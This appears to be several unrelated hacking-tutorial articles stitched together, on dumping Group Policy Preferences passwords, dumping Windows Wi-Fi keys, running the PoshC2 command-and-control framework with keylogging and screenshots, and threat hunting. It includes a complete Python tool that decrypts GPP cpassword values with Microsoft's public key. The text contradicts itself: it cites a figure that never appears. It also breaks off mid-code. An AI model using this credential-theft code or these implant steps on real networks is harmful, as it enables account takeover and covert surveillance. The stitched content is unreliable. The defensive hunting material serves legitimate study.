Credential Dumping: Group Policy Preferences (GPP)

Most Windows administrators know “Group Policy Preferences”, introduced with Windows Server 2008, which let them push specific configuration to domain machines, including creating a local user account with a password stored in the preference item. What is less well known is that the password inside a preference item is not protected in any meaningful way, so any ordinary domain user can read it, elevate to local administrator on every machine the policy applies to, and potentially compromise the security of the entire domain.

Table of Content

  • What is Group Policy Preferences?
  • Why using GPP to create a user account is a bad Idea?
  • Lab Setup Requirement
  • Create an Account in Domain Controller with GPP
  • Exploiting Group Policy Preferences via Metasploit -I
  • Exploiting Group Policy Preferences via Metasploit -II
  • Gpp-Decrypt
  • GP3finder
  • Powershell Empire

What is Group Policy Preferences?

Group Policy Preferences, usually shortened to GPP, let administrators configure and deploy Windows and application settings that were previously unavailable through Group Policy. One of their most used features is the ability to store credentials inside a policy, and these policies can make all kinds of configuration changes to machines, such as:

  • Map Drives
  • Create Local Users
  • Data Sources
  • Printer configuration
  • Registry Settings
  • Create/Update Services
  • Scheduled Tasks
  • Change local Administrator passwords

Why using GPP to create a user account is a bad Idea?

If you use Microsoft GPP to create a local administrator account, consider the security consequences carefully, because the password is stored in SYSVOL inside the preference item. SYSVOL is the domain-wide share in Active Directory that every authenticated user can read.

All domain Group Policies are stored here: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\

When a new GPP item is created for a user or group account, it is written to a Groups.xml file in SYSVOL that holds the configuration, and the password is stored in the cpassword attribute encrypted with AES-256. The encryption does not help: Microsoft published the AES key in the MS-GPPREF protocol documentation, so anyone who can read SYSVOL, which is every authenticated user, can decrypt every cpassword in the domain. MS14-025 removed the ability to set passwords in new preference items, but it did not remove the XML files that already exist in SYSVOL.

In this article, we do Active Directory penetration testing through Group Policy Preferences and steal the stored password from SYSVOL in several different ways.

Let’s Start!!

Lab Setup Requirement

  • Microsoft Windows Server 2008 r2
  • Microsoft Windows 7/10
  • Kali Linux

Create an Account in Domain Controller with GPP

On the Windows Server 2008 machine, create a new Group Policy Object (GPO) linked to the Domain Controllers OU using the Group Policy Management console.

Now create a new user account by navigating to Computer Configuration > Preferences > Control Panel Settings > Local Users and Groups.

Right-click the “Local Users and Groups” node and select New > Local User.

This opens the New Local User Properties dialog, where you can create the new user account.

As you can observe from the given below image, we had created an account for user “raaz”.

Don’t forget to refresh Group Policy on the clients so the new preference item is applied.

As discussed above, whenever a new GPP item is created for a user or group account, it is associated with a Groups.xml file stored under SYSVOL.

The image below shows the full path that leads to Groups.xml. The file holds the cpassword for user raaz inside the Properties tag. The value is base64-encoded AES ciphertext rather than literal plaintext, but because the key is public it is as good as plaintext.

Exploiting Group Policy Preferences via Metasploit -I

Since any authenticated user can read SYSVOL, suppose we know one low-privileged domain account on the client machine, say raj with password [email protected]. With it we can read the XML file from the domain controller. The Metasploit auxiliary module auxiliary/scanner/smb/smb_enum_gpp does the work for us: it connects to the domain controller over SMB as that user, enumerates the policy files in SYSVOL, and decrypts any cpassword it finds.

This module enumerates files on the target domain controllers over SMB, looks for Group Policy Preference XML files that contain local or domain user accounts and passwords, and decrypts them using Microsoft’s public AES key. It has been tested successfully against a Windows 2008 R2 domain controller.

As you can see, it dumped the password [email protected] for user raaz from the Groups.xml file.

Exploiting Group Policy Preferences via Metasploit -II

Metasploit also provides a post-exploitation module for enumerating cpassword values (post/windows/gather/credentials/gpp), but for this you need to have compromised a domain-joined machine at least once; with a Meterpreter session in hand you can run the post module below.

This module discovers the victim machine’s domain controller and connects to it via SMB. It then looks for Group Policy Preference XML files containing local user accounts and passwords and decrypts them using Microsoft’s public AES key. Cached Group Policy files may also be found on the end-user device itself if the group policy object was deleted rather than unlinked.

In the image below you can see that it found the cpassword twice, in two different locations:

  • C:\ProgramData\Microsoft\Group Policy\History\{EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml
  • C:\Windows\SYSVOL\sysvol\Pentest.Local\Policies\{EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml

Gpp-Decrypt

Another method is to connect to the domain controller over SMB with smbclient and open the SYSVOL share with an authorized account, then navigate to the following path to fetch Groups.xml: SYSVOL\sysvol\Pentest.Local\Policies\{EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml

As you can see, we have transferred Groups.xml to our local machine. Since this file holds the cpassword, we now need to decrypt it.

For decryption we use gpp-decrypt, a small Ruby script shipped with Kali Linux that decrypts a given GPP-encrypted string.

Once you have the Groups.xml file, you can decrypt the cpassword with the following syntax:

As a result, it dumps password in plain text as shown below.

GP3finder

GP3finder is another script, written in Python, that decrypts cpassword values (and can also search a share for the XML files that contain them); you can download the tool from here.

Once you have the Groups.xml file, you can decrypt the cpassword with the following syntax:

As a result, it dumps password in plain text as shown below.
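Both gpp-decrypt and GP3finder do the same thing under the hood: base64-decode the cpassword, decrypt it with AES-256-CBC using Microsoft’s published key and an all-zero IV, strip the PKCS#7 padding and decode the result as UTF-16LE. The following is an added example, not code from the article, from gpp-decrypt or from GP3finder, that does exactly this with the Python standard library only (a compact AES implementation is included so it runs where no crypto package is installed) and then walks a Groups.xml looking for every element that carries a cpassword attribute. The Groups.xml below is constructed for the example; the cpassword inside it is the sample value from Microsoft’s MS-GPPREF documentation, and the user name raaz is the account created earlier in the article.

```python
"""Find and decrypt Group Policy Preferences cpassword values offline (standard library only)."""
import base64
import xml.etree.ElementTree as ET
from functools import reduce
from operator import xor

# AES-256 key published by Microsoft in MS-GPPREF section 2.2.1.1.4; it is identical in every domain.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")


def _gmul(a, b):
    # Multiplication in GF(2^8) modulo the AES polynomial x^8 + x^4 + x^3 + x + 1.
    r = 0
    for _ in range(8):
        r ^= a if b & 1 else 0
        a, b = ((a << 1) ^ (0x11B if a & 0x80 else 0)) & 0xFF, b >> 1
    return r


def _build_sbox():
    # S(a) = affine(a^-1), with a^-1 = a^254 computed by repeated squaring (0 maps to 0).
    sbox = []
    for a in range(256):
        inv, p = 1, a
        for _ in range(7):
            p = _gmul(p, p)
            inv = _gmul(inv, p)
        s = inv
        for k in range(1, 5):
            s ^= ((inv << k) | (inv >> (8 - k))) & 0xFF
        sbox.append(s ^ 0x63)
    return sbox


SBOX = _build_sbox()
INV_SBOX = [SBOX.index(v) for v in range(256)]


def _expand_key(key):
    # FIPS-197 key schedule for Nk = 8: 60 words, grouped into 15 round keys of 16 bytes each.
    w = [list(key[i:i + 4]) for i in range(0, 32, 4)]
    rcon = 1
    for i in range(8, 60):
        t = list(w[-1])
        if i % 8 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]   # RotWord then SubWord
            t[0] ^= rcon
            rcon = _gmul(rcon, 2)
        elif i % 8 == 4:
            t = [SBOX[b] for b in t]
        w.append([x ^ y for x, y in zip(w[i - 8], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(15)]


def _inv_shift_rows(s):
    # State index is row + 4*column; InvShiftRows rotates row r right by r positions.
    return [s[r + 4 * ((c - r) % 4)] for c in range(4) for r in range(4)]


def _inv_mix_columns(s):
    coef = (14, 11, 13, 9)   # first row of the InvMixColumns matrix; the other rows are rotations
    return [reduce(xor, (_gmul(s[4 * c + j], coef[(j - r) % 4]) for j in range(4)))
            for c in range(4) for r in range(4)]


def _decrypt_block(rk, block):
    s = [b ^ k for b, k in zip(block, rk[14])]
    for rnd in range(13, 0, -1):
        s = [INV_SBOX[b] for b in _inv_shift_rows(s)]
        s = _inv_mix_columns([b ^ k for b, k in zip(s, rk[rnd])])
    s = [INV_SBOX[b] for b in _inv_shift_rows(s)]
    return bytes(b ^ k for b, k in zip(s, rk[0]))


def decrypt_cpassword(cpassword):
    """cpassword = base64 (with '=' padding stripped) of AES-256-CBC, zero IV, PKCS#7-padded UTF-16LE."""
    data = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))
    rk = _expand_key(GPP_AES_KEY)
    prev, plain = bytes(16), b""
    for i in range(0, len(data), 16):
        blk = data[i:i + 16]
        plain += bytes(p ^ v for p, v in zip(_decrypt_block(rk, blk), prev))
        prev = blk
    return plain[:-plain[-1]].decode("utf-16-le")


def find_gpp_passwords(xml_text):
    """Return (account, password) for every preference item in the XML that carries a cpassword."""
    found = []
    for el in ET.fromstring(xml_text).iter():
        if el.get("cpassword"):
            account = el.get("userName") or el.get("newName") or el.get("accountName")
            found.append((account, decrypt_cpassword(el.get("cpassword"))))
    return found


# Constructed Groups.xml for this example; the cpassword is the sample value from MS-GPPREF.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups><User name="raaz" changed="2020-04-01 10:00:00">
  <Properties action="C" userName="raaz" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"/>
</User></Groups>"""
```

Call decrypt_cpassword() on a value copied out of any policy file, or find_gpp_passwords() on the whole file: because it keys on the attribute rather than on a particular element, it works on Groups.xml as well as on ScheduledTasks.xml, Services.xml, DataSources.xml, Drives.xml and Printers.xml, all of which can carry a cpassword under SYSVOL.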

PowerShell Empire

This is another framework, much like Metasploit, where you first need a low-privilege agent on the target. Once you have one, use the privesc/gpp module to extract the password from inside the Groups.xml file.

The module retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.

As a result, it dumps password in plain text as shown below.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Credential Dumping: Wireless

Today we look at how to dump wireless credentials from a Windows host: what credential dumping is, where it fits in red teaming, and the different ways to recover those pesky Wi-Fi passwords.

Table of Content

  • What is Credential Dumping?
  • Credential Dumping in Real Life
  • Credential Dumping and Red Teaming
  • Credential Dumping Methods
    • netsh
    • WirelessKeyView
    • Wifi Network Properties
    • LaZagne
    • Mimikatz
    • Metasploit Framework
  • Mitigation

What is Credential Dumping?

In the cyber-security world the term “password cracking” is used loosely, covering every method of attacking, dumping or retrieving the passwords of a victim or target. In this article we focus solely on one of those techniques, credential dumping.

Credential dumping is the technique of extracting the usernames and passwords of login accounts from a target system. It lets an attacker obtain the credentials of many accounts from one person, and those credentials can be for anything: a bank, an email account, social media, or wireless networks.

Credential Dumping in Real Life

Once an attacker has access to the target system, they can use that access to retrieve a whole set of its credentials. There are multiple methods for each kind of credential; for instance, to recover the names and passwords of every wireless network the operating system has connected to, an attacker has several methods available, and we try to cover all of them in this article. Credential dumping applies to both internal and external penetration testing; which method suits best depends on the methodology and perspective of the engagement.

Credential Dumping Methods

As in the scenario above, this article walks through the various methods of dumping wireless credentials from a system. So, let’s get started.

Manual Credential Dumping

All saved Wi-Fi profiles, with their respective SSIDs, are stored as XML files under C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\<interface GUID>\. In these files the SSID is saved in clear text, whereas the key is stored in the keyMaterial element as a DPAPI-protected blob (protected is set to true), which is why reading the file alone does not give you the password; it has to be decrypted on the host that wrote it, which is what the tools below do for you.

Credential Dumping using netsh

Netsh (network shell) is a scripting utility that Microsoft ships with Windows and that can be used from both Command Prompt and Windows PowerShell. It provides detailed information about every network configuration the system has ever had, including the credentials of the wireless networks it has connected to. It takes various parameters to retrieve different information as required. Because it runs from whatever shell you have on the host, the method works in both internal and external penetration testing, from a local console or a remote shell.

To list the SSIDs the device has connected to, use the following command:

As a result of the command you can see the names of the Wi-Fi networks the system has connected to, past or present, such as Meterpreter and Linuxlab, as shown in the image above.

Then, to get the password of any one of the listed SSIDs, use the following command:

Just as shown in the image above, the output of the command gives you the password.
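Both sources described above, the netsh output and the Wlansvc profile XML, can be consumed programmatically, which is what you want when collecting from many hosts. The following is an added example, not code from the article, that parses the output of `netsh wlan show profile name="<SSID>" key=clear` (after `netsh wlan show profiles` has listed the names) and the profile XML from the Interfaces directory mentioned above. The netsh output and the profile XML below are constructed for the example; the keyMaterial value is a truncated placeholder showing only the DPAPI blob header, because a real one is only decryptable on the host that wrote it.

```python
"""Parse the two places Windows keeps Wi-Fi profiles: netsh output and the Wlansvc profile XML."""
import re
import xml.etree.ElementTree as ET

WLAN_NS = {"w": "http://www.microsoft.com/networking/WLAN/profile/v1"}


def parse_netsh_profile(text):
    """Extract SSID, authentication and key from `netsh wlan show profile name=<x> key=clear` output."""
    def field(label):
        m = re.search(r"^\s*" + re.escape(label) + r"\s*:\s*(.+?)\s*$", text, re.M)
        return m.group(1) if m else None
    return {
        "ssid": (field("SSID name") or "").strip('"') or None,
        "authentication": field("Authentication"),
        # Open networks report 'Security key : Absent' and have no 'Key Content' line at all.
        "key": field("Key Content") if field("Security key") == "Present" else None,
    }


def parse_wlan_profile_xml(xml_text):
    """Extract name, SSID and the sharedKey block from a Wlansvc profile file."""
    root = ET.fromstring(xml_text)
    ssid_hex = root.findtext("w:SSIDConfig/w:SSID/w:hex", namespaces=WLAN_NS)
    result = {
        "name": root.findtext("w:name", namespaces=WLAN_NS),
        "ssid": bytes.fromhex(ssid_hex).decode() if ssid_hex else None,
    }
    shared = root.find("w:MSM/w:security/w:sharedKey", WLAN_NS)
    if shared is not None:
        result.update({
            "key_type": shared.findtext("w:keyType", namespaces=WLAN_NS),
            "protected": shared.findtext("w:protected", namespaces=WLAN_NS) == "true",
            # When protected is true, keyMaterial is a hex-encoded DPAPI blob, not the passphrase.
            "key_material": shared.findtext("w:keyMaterial", namespaces=WLAN_NS),
        })
    return result


# Constructed netsh output for a WPA2 network and for an open network.
NETSH_OUTPUT = """
Profile Linuxlab on interface Wi-Fi:
=======================================================================

Applied: All User Profile

Profile information
-------------------
    Version                : 1
    Type                   : Wireless LAN
    Name                   : Linuxlab

Connectivity settings
---------------------
    Number of SSIDs        : 1
    SSID name              : "Linuxlab"
    Network type           : Infrastructure

Security settings
-----------------
    Authentication         : WPA2-Personal
    Cipher                 : CCMP
    Security key           : Present
    Key Content            : Hunter2!LabKey
"""

NETSH_OPEN_OUTPUT = """
Profile CoffeeShop on interface Wi-Fi:
    SSID name              : "CoffeeShop"
    Authentication         : Open
    Cipher                 : None
    Security key           : Absent
"""

# Constructed profile XML; keyMaterial is a truncated placeholder (DPAPI blob header only).
PROFILE_XML = """<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>Linuxlab</name>
  <SSIDConfig><SSID><hex>4C696E75786C6162</hex><name>Linuxlab</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <connectionMode>auto</connectionMode>
  <MSM><security>
    <authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX></authEncryption>
    <sharedKey><keyType>passPhrase</keyType><protected>true</protected><keyMaterial>01000000D08C9DDF0115D1118C7A00C04FC297EB</keyMaterial></sharedKey>
  </security></MSM>
</WLANProfile>"""
```

On a live host you would feed parse_netsh_profile() the captured netsh output for each name returned by `netsh wlan show profiles`, and parse_wlan_profile_xml() each file under the Interfaces directory; the second tells you which profiles even have a key and of what type, which is useful when netsh is unavailable or when you are working from a copied-off ProgramData folder.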

Credential Dumping using WirelessKeyView

WirelessKeyView is a simple tool that reads the XML files where the wireless profiles are stored and reveals the keys in clear text. It was developed to recover lost or forgotten wireless passwords. It is a good fit for credential dumping in an internal network penetration test. To use it, download the tool from here and run it; you get all the Wi-Fi names and their passwords as shown in the image below:

Credential Dumping using Wifi Network Properties

Our next method is manual. It is useful when you have been introduced to the network and are working on the machine, but for some reason the network password has not been shared with you, so it falls under internal penetration testing. To reveal the password of a wireless network manually, go to Control Panel > Network and Internet > Network and Sharing Center and click the Wi-Fi (SSID) link. In the dialog that opens, click the Wireless Properties button, then go to the Security tab, tick Show characters, and the password is displayed, as in the image below:

Credential Dumping using LaZagne

LaZagne is an open-source tool developed to retrieve all the passwords stored on a machine. We have covered LaZagne in another article, which you can read here. In our experience LaZagne is an excellent tool for credential dumping and a good choice for external penetration testing. To extract Wi-Fi passwords with LaZagne, download the tool from here and run its wifi module on the target with the following command:

After the command runs, all the Wi-Fi passwords with their respective SSIDs are extracted.

Credential Dumping using Mimikatz

Another method that can be very useful in an external penetration test is Mimikatz. We have covered the various features of Mimikatz in another article, which you can find here. Once you have a session on the victim, use the following commands to get the passwords:

Just like that, all the passwords are at your service, as shown in the image above.

Credential Dumping using Metasploit Framework

Our next method uses Metasploit to retrieve the passwords. As everyone knows, Metasploit is a framework of ready-made exploits and post-exploitation modules that makes pentesting convenient, and it is a great platform for beginners and experts alike.

Metasploit has a built-in post module for exactly this (post/windows/wlan/wlan_profile). Start msfconsole, get a session on the target with any exploit you prefer, background the session, and run the post module to extract the Wi-Fi credentials with the following commands:

As shown in the image above, you get the credentials.

Mitigation

There are various measures you can take to protect yourself from credential dumping attacks:

  • Keep your employees aware
  • Do not use the default SSID of a wireless network
  • Do not save Wi-Fi passwords on the system
  • Always reconnect to Wi-Fi manually instead of letting Windows remember the network
  • Have a separate network for guests
  • Use a VPN
  • Change your Wi-Fi password regularly
  • Use a different internal IP address range instead of the default one
  • Physically secure your modem or router: most of them have a reset button, and pressing it restores the factory settings, which have no security configured and allow anyone to connect.

So, these were the methods to dump wireless credentials. Apply the suggested mitigations to your systems and networks to keep yourself safe from attackers. I hope these were useful; keep tuning in for more hacking techniques!

We are well aware these are tough times for everyone and, we, here at hacking articles hope and pray that everyone is safe and following the measure of self-quarantine. And for all the hacking/pen-testing enthusiasts we are working hard to bring more and more new content so that you can learn new things and use this self-isolation to its best. Stay Safe and take care! Happy Hacking!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here

Command & Control: PoshC2

PoshC2 is an open-source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in PowerShell. Although PoshC2 primarily focuses on Windows implantation, it does contain a basic Python dropper for Linux/macOS.

Table of Content

  • Introduction
  • Features
  • Installation
  • Enumerate User Information
  • Enumerate Computer Information
  • Find All Vulnerabilities
  • Invoke ARP Scan
  • Get Key Strokes
  • Get Screenshot

Features of PoshC2

  • Highly configurable payloads, including default beacon times, jitter, kill dates, user agents and more.
  • A large number of payloads generated out-of-the-box which are frequently updated and are maintained to bypass common Anti-Virus products.
  • Auto-generated Apache Rewrite rules for use in C2 proxy, protecting your C2 infrastructure and maintaining good operational security.
  • A modular format allowing users to create or edit C#, PowerShell or Python3 modules which are run in-memory by the Implants.
  • Notifications on receiving a successful Implant, such as via text message or Pushover.
  • A comprehensive and maintained contextual help and an intelligent prompt with contextual auto-completion, history, and suggestions.
  • Fully encrypted communications, protecting the confidentiality and integrity of the C2 traffic even when communicating over HTTP.
  • Client/Server format allowing multiple team members to utilize a single C2 server.
  • Extensive logging. Every action and response is timestamped and stored in a database with all relevant information such as user, host, implant number, etc. In addition to this, the C2 server output is directly logged to a separate file.
  • Support for Docker, allowing reliable and cross-platform execution

Installation of PoshC2

PoshC2 can be installed for Python 3 automatically with a curl one-liner from the project’s GitHub repository. The command needs an elevated shell to complete successfully.

Now that PoshC2 is installed from GitHub, we need to point the listener at our IP address. This is done by editing the config file with the following command.

After the configuration is done, we need two terminals: one for the server and one for the Implant Handler. The Implant Handler is the console used to issue commands to the server and to the implants.

Next we run the server, which communicates with the implants and receives the task output.

You can use any of the payload delivery methods shown in the image above to gain a session. As soon as the payload runs on the target, an implant checks in to the Implant Handler, as shown in the image below.

Enumerate User Information

Now that we have an active implant in PoshC2, it is time to run some built-in modules to gather information about the target system. We start with user and group information. This module dumps all local users, local groups and their membership on the target machine, gathering everything through WMI. To start it we use the following command:

After a short while the implant returns all the user-related information from the target machine: the local users, the local groups and their membership.

Enumerate Computer Information

Having enumerated the users, it is time to get information about the system itself. For this we use another module, an external PowerShell script integrated into PoshC2 under the same name. It uses PSInfo from Sysinternals to gather the computer name, domain, operating system, OS architecture and much more.

After a short while the implant returns a great deal of system-related information from the target machine.

Find All Vulnerabilities

Next comes an automated module that enumerates the target machine for a wide range of local privilege escalation methods, working much like Windows Exploit Suggester. It is another PowerShell script integrated into PoshC2, like the previous one. We invoke it with the command given below:

After a short while the implant returns all the possible exploits that could be used to elevate privileges on this machine.

Invoke ARP Scan

We can run an ARP scan from the implant. The module is based on the PowerShell ArpScanner and uses C# assembly loading: it declares [DllImport("iphlpapi.dll", ExactSpelling=true)] to import SendARP and, by default, loops through all interfaces and ARP-scans the local network based on the IP address and subnet mask of each network adapter. It is invoked as shown in the image below:

Here we can see that the arp-scan module ran successfully, giving us a list of IP addresses on the same network as the target implant.

Get Key Strokes

Now we capture keystrokes from the target using the get-keystrokes module. The process has two parts: first we start the capture, then we read the captured keystrokes. Although this is an external module originally from PowerShellMafia, it has been changed to run in memory and not touch disk. We start capturing keystrokes with the following command:

By default the keylogger runs for 60 minutes. It has started capturing keystrokes, as shown in the image below:

Now to read those keystrokes, we need to run the following command:

This shows all the keystrokes typed on the target. It is better than other keystroke sniffing methods because it also records modifier and function keys such as Ctrl and Shift, which can be quite helpful in some scenarios.

Get Screenshot

Now it’s time to take a look at the target’s screen, using the get-screenshot module. It is straightforward: the implant captures the screen the target is using at that moment, which is useful as evidence or simply to see directly what the target is doing. Start it with the following command:

As you can see in the following image, the command ran successfully and we captured the target’s live screen.

As noted in the image above, you can navigate to the screenshot’s location on the C2 server and open it. The screenshot we captured is shown below:

Author: Kavish Tyagi is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

A Deep Dive on Proactive Threat Hunting

We all know that proactive threat hunting is the need of the hour. In our previous article, “Threat Hunting – A proactive Method to Identify Hidden Threat”, we covered the basic requirements and the generic steps of a threat hunting activity.

In this post you will learn the main factors to consider before conducting a threat hunt in any organisation. These key factors help an organisation prepare a roadmap for the hunt before executing it.

Table of Content

  • The pyramid of Pain
  • Threat Hunting Techniques
  • Datasets
  • Hunting Maturity Model (HMM)

The Pyramid of Pain

The Pyramid of Pain, first proposed by security professional David J. Bianco in 2013, ranks indicators of compromise by how much it costs the adversary when you deny them, with the aim of making indicators more useful in incident response and threat hunting.

  • The pyramid measures the potential usefulness of your intel
  • It also measures the difficulty of obtaining that intel
  • The higher up the pyramid you operate, the more resources your adversaries have to expend

For example, if an attacker uses malware on an endpoint somewhere in their attack chain and the defender detects it by file hash, it is trivial for the attacker to recompile the malware so that the hash the team relies on to detect the original sample no longer matches.

Hash Values: Identifying indicators of compromise by their hash values is the most trivial step. Unfortunately, hashes are extremely susceptible to change (even accidentally).

IP Addresses: An IPv4 or IPv6 address; in most cases netblocks or CIDR ranges also fit here.

Only a foolish attacker uses their own addresses; VPNs, Tor and open proxies all make it easy to change the IP address.

If the address is hard-coded into a config, the adversary has to do a little work to update it. We have also seen attackers confuse targets by writing a malicious IP in DWORD form, a single 32-bit integer, which browsers accept as a host. For example, the following URL points at 74.21.11.150:

“http://1242893206/GoogleSearch.image”

IP to DWORD format

1) Split the original IP address into its four octets. Taking the address above, 74.21.11.150, the octets are 74, 21, 11 and 150.

2) Convert each octet to hex, keeping two hex digits per octet: 4A, 15, 0B and 96, which concatenate to 4A150B96.

3) Convert the hex value 4A150B96 to decimal and you get 1242893206, the DWORD form of the IP address. Keep the leading zero of 0B: dropping it gives 4A15B96, which decodes to 4.161.91.150, a completely different host.

Domain Names: This could be a domain name itself (e.g., “freeinternet.net”) or a sub- or sub-sub-domain (e.g., “the.new.game.freeinternet.net”).
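The DWORD conversion above is easy to get wrong by hand, and a hunter matching proxy logs against an IP indicator needs the reverse direction as well. The following is an added example, not part of the article, that implements both directions in Python and goes beyond the page’s DWORD case: it normalises every spelling of an IPv4 host that a browser (following the classic inet_aton rules) accepts, including hex (0x4A150B96), octal (0112.025.013.0226) and the short forms (74.21.2966) where the last component fills the remaining bytes. The URLs used are the article’s example and constructed variants of it.

```python
"""Normalise obfuscated IPv4 hosts (DWORD, hex, octal, short forms) back to dotted-quad."""
from urllib.parse import urlsplit


def ip_to_dword(ip):
    """'74.21.11.150' -> 1242893206 (big-endian, as the text's manual conversion does)."""
    octets = [int(o) for o in ip.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"not a dotted quad: {ip!r}")
    n = 0
    for o in octets:
        n = (n << 8) | o
    return n


def dword_to_ip(n):
    if not 0 <= n <= 0xFFFFFFFF:
        raise ValueError(f"out of 32-bit range: {n}")
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def _component(text):
    # inet_aton rules: 0x.. is hex, a leading 0 means octal, anything else is decimal.
    t = text.lower()
    if t.startswith("0x"):
        return int(t[2:] or "0", 16)
    if len(t) > 1 and t[0] == "0":
        return int(t, 8)
    return int(t, 10)


def host_to_ip(host):
    """Accept 'a.b.c.d', 'a.b.c', 'a.b' or 'a' with components in decimal, hex or octal."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        raise ValueError(f"bad host: {host!r}")
    *head, last = [_component(p) for p in parts]
    tail_bits = 8 * (4 - len(head))          # the final component fills all remaining bytes
    if any(v > 0xFF for v in head) or last >= 1 << tail_bits:
        raise ValueError(f"component out of range: {host!r}")
    n = 0
    for v in head:
        n = (n << 8) | v
    return dword_to_ip((n << tail_bits) | last)


def url_host_to_ip(url):
    """Dotted-quad the browser would actually connect to, or None if the host is a real name."""
    host = urlsplit(url).hostname
    try:
        return host_to_ip(host) if host else None
    except ValueError:
        return None
```

Run url_host_to_ip() over the host part of every URL in your proxy or DNS logs before comparing with an IP-based indicator; the page’s original figure of 77683606 is what you get when the leading zero is dropped, and dword_to_ip(77683606) shows it is 4.161.91.150 rather than the intended host.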

Attackers use fast-flux or double-flux DNS to mask and protect their actual infrastructure. They compromise a range of easy targets, such as vulnerable computers or weak home routers, and use them as relays that carry command-and-control messages and data to and from the real backend.

The report “APT1: Exposing One of China’s Cyber Espionage Units | Mandiant | FireEye” describes how the attackers behind APT1 went about registering their domains; it attributes the registrations to specific personas:

1) The first persona, “UglyGorilla”, has been active in computer network operations since October 2004. His activities include registering domains attributed to APT1 and authoring malware used in APT1 campaigns. “UglyGorilla” publicly expressed his interest in China’s “cyber troops” in January 2004.

2) The second persona, an actor we call “DOTA”, has registered dozens of email accounts used to conduct social engineering and spear-phishing attacks in support of APT1 campaigns. “DOTA” used a Shanghai phone number while registering these accounts.

3) We have observed both the “UglyGorilla” persona and the “DOTA” persona using the same shared infrastructure, including FQDNs and IP ranges that we have attributed to APT1.

Network/Host Artifacts: It is very difficult for an adversary to conduct any useful operation without leaving traces, so any byte that flows through the network as a result of the adversary’s activity may be an artifact.

For example, outbound traffic to a C&C server is a network artifact, while on hosts, files and folders, registry objects, mutexes and memory strings are host artifacts.

Tools: Here the hunter investigates what programs or commands intruders might use to achieve their goal, such as PowerShell, Mimikatz, or other commands that circumvent restrictions to enable lateral movement.

Tactics, Techniques and Procedures (TTPs): Here the hunter examines how the intruder achieves their goal across the cyber kill chain (as discussed in Part I). Adversaries frequently choose social engineering such as phishing, the most common TTP for gaining a foothold in the network, by attaching or linking a malicious object in the mail.

Threat Hunting Techniques

Skilled threat hunters use a variety of techniques when reviewing data sources such as firewall logs, SIEM and IDS alerts, DNS logs, file and network data, authentication systems and others in order to detect IoCs and recognise the threat.

SEARCHING

This is the simplest and least demanding technique in threat hunting: querying data for specific artifacts using defined search criteria and tools. It works over environmental data such as logs, alerts, memory dumps and system events. A hunter has a great deal of data to analyse and, at the start of a search, rarely knows exactly what they are looking for, so two things must be kept in mind:

  • Hunting too widely for common artifacts produces a flood of results of very little use.
  • Focusing too narrowly leads to very few findings and prevents any conclusion from being drawn.

CLUSTERING

Clustering is an analytical technique, typically performed with machine learning, that separates a larger data set into groups (clusters) of related data points based on certain characteristics. The technique is widely used in fields such as machine learning, pattern recognition, information retrieval, data compression, computer graphics and statistical data analysis.

source: https://en.wikipedia.org/wiki/Cluster_analysis

In hunting it is a statistical technique in which similar data points, selected on specific attributes of a large data set, are separated into groups. It is most effective on a broad set of data points that do not obviously share behavioural characteristics. Clustering surfaces aggregate behaviours, such as an unusual number of instances of a common occurrence, through applications like outlier detection.


GROUPING

Grouping takes a set of distinct artifacts and identifies when several of them occur together based on common criteria, for example incidents that occur within a given time window. It is best used when hunting for other artifacts that are similarly unusual.

Grouping differs from clustering: it is performed after clustering, on the unusual data sets the researcher is concerned with, in order to find the root cause, whereas clustering works over enormous quantities of data to identify the data sets that then need further analysis with grouping.

STACKING

Stack counting, or stacking, is an analysis method for finding the needle in the haystack. It is the most popular practice hunters use to examine a hypothesis.

“You are already familiar with the idea if you have ever used pivot tables in Microsoft Office, the stats command in Splunk or the top command in ArcSight.”

Data stacking isolates and classifies patterns by running frequency analysis over large quantities of related data. It requires a systematic method of reducing vast volumes of data into manageable chunks that can be processed and analysed.

Given a large data set, the investigator identifies the attributes that differentiate the odd rows and may show that they are malicious. Those attributes become the grouping parameters on which the frequency analysis counts.

For example: stacking the thread count of each process with the help of Process Explorer.
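As an added example (not from the article), here is stack counting in Python over a constructed set of process-creation records from four hosts, the kind of data Sysmon event ID 1 or EDR telemetry provides. Stacking on the image alone surfaces the look-alike binary in C:\Users\Public; stacking on the (image, parent) pair additionally surfaces a genuine svchost.exe launched from cmd.exe, which a single-column stack hides because svchost.exe itself is common everywhere. Host names and paths in the records are constructed.

```python
"""Stack counting: frequency analysis to surface rare values in fleet-wide telemetry."""
from collections import Counter

SVCHOST = r"C:\Windows\System32\svchost.exe"
SERVICES = r"C:\Windows\System32\services.exe"
EXPLORER = r"C:\Windows\explorer.exe"
USERINIT = r"C:\Windows\System32\userinit.exe"
CMD = r"C:\Windows\System32\cmd.exe"
LOOKALIKE = r"C:\Users\Public\svch0st.exe"


def _rec(host, image, parent):
    return {"host": host, "image": image, "parent": parent}


# Constructed process-creation records (think Sysmon event ID 1 collected from four workstations).
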